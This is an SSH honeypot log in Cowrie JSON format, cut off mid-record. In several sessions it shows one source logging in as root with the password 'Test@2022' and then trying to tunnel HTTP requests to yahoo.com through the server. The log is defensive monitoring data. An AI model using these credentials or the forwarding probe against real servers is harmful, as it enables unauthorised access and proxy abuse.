{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60874,"dst_ip":"1.2.3.4","dst_port":22,"session":"1284e120f2df","protocol":"ssh","message":"New connection: 213.209.150.239:60874 (1.2.3.4:22) [session: 1284e120f2df]","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.307429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.317746Z","src_ip":"213.209.150.239","session":"1284e120f2df"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.356198Z","src_ip":"213.209.150.239","session":"1284e120f2df"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.591273Z","src_ip":"213.209.150.239","session":"1284e120f2df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24648,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24648","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.639163Z","session":"1284e120f2df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.686533Z","src_ip":"213.209.150.239","session":"1284e120f2df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3525,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3525","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.821590Z","session":"1284e120f2df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.868878Z","src_ip":"213.209.150.239","session":"1284e120f2df"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.917598Z","src_ip":"213.209.150.239","session":"1284e120f2df"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60919,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2df79d90e19","protocol":"ssh","message":"New connection: 213.209.150.239:60919 (1.2.3.4:22) [session: d2df79d90e19]","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.973325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.974022Z","src_ip":"213.209.150.239","session":"d2df79d90e19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.030730Z","src_ip":"213.209.150.239","session":"d2df79d90e19"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.312758Z","src_ip":"213.209.150.239","session":"d2df79d90e19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":14585,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14585","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.370306Z","session":"d2df79d90e19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.427047Z","src_ip":"213.209.150.239","session":"d2df79d90e19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":27256,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27256","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.582981Z","session":"d2df79d90e19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.639649Z","src_ip":"213.209.150.239","session":"d2df79d90e19"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.697174Z","src_ip":"213.209.150.239","session":"d2df79d90e19"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60965,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce17d2bd5f39","protocol":"ssh","message":"New connection: 213.209.150.239:60965 (1.2.3.4:22) [session: ce17d2bd5f39]","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.752352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.753540Z","src_ip":"213.209.150.239","session":"ce17d2bd5f39"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:35.809873Z","src_ip":"213.209.150.239","session":"ce17d2bd5f39"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.092187Z","src_ip":"213.209.150.239","session":"ce17d2bd5f39"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":10857,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10857","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.150014Z","session":"ce17d2bd5f39"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.206553Z","src_ip":"213.209.150.239","session":"ce17d2bd5f39"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29894,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29894","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.362885Z","session":"ce17d2bd5f39"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.419498Z","src_ip":"213.209.150.239","session":"ce17d2bd5f39"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.476558Z","src_ip":"213.209.150.239","session":"ce17d2bd5f39"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61016,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8857a080eef","protocol":"ssh","message":"New connection: 213.209.150.239:61016 (1.2.3.4:22) [session: f8857a080eef]","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.532413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.533242Z","src_ip":"213.209.150.239","session":"f8857a080eef"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.589772Z","src_ip":"213.209.150.239","session":"f8857a080eef"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.872309Z","src_ip":"213.209.150.239","session":"f8857a080eef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":3210,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:3210","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.929671Z","session":"f8857a080eef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:36.986512Z","src_ip":"213.209.150.239","session":"f8857a080eef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3416,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3416","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.143115Z","session":"f8857a080eef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.200016Z","src_ip":"213.209.150.239","session":"f8857a080eef"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.257670Z","src_ip":"213.209.150.239","session":"f8857a080eef"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61063,"dst_ip":"1.2.3.4","dst_port":22,"session":"05f44e5a7746","protocol":"ssh","message":"New connection: 213.209.150.239:61063 (1.2.3.4:22) [session: 05f44e5a7746]","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.303778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.305108Z","src_ip":"213.209.150.239","session":"05f44e5a7746"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.352234Z","src_ip":"213.209.150.239","session":"05f44e5a7746"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.587416Z","src_ip":"213.209.150.239","session":"05f44e5a7746"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":22375,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:22375","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.635494Z","session":"05f44e5a7746"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.682735Z","src_ip":"213.209.150.239","session":"05f44e5a7746"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4017,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4017","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.817370Z","session":"05f44e5a7746"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.864351Z","src_ip":"213.209.150.239","session":"05f44e5a7746"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.912567Z","src_ip":"213.209.150.239","session":"05f44e5a7746"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61105,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d1446cd9886","protocol":"ssh","message":"New connection: 213.209.150.239:61105 (1.2.3.4:22) [session: 8d1446cd9886]","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.968745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:37.969394Z","src_ip":"213.209.150.239","session":"8d1446cd9886"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc",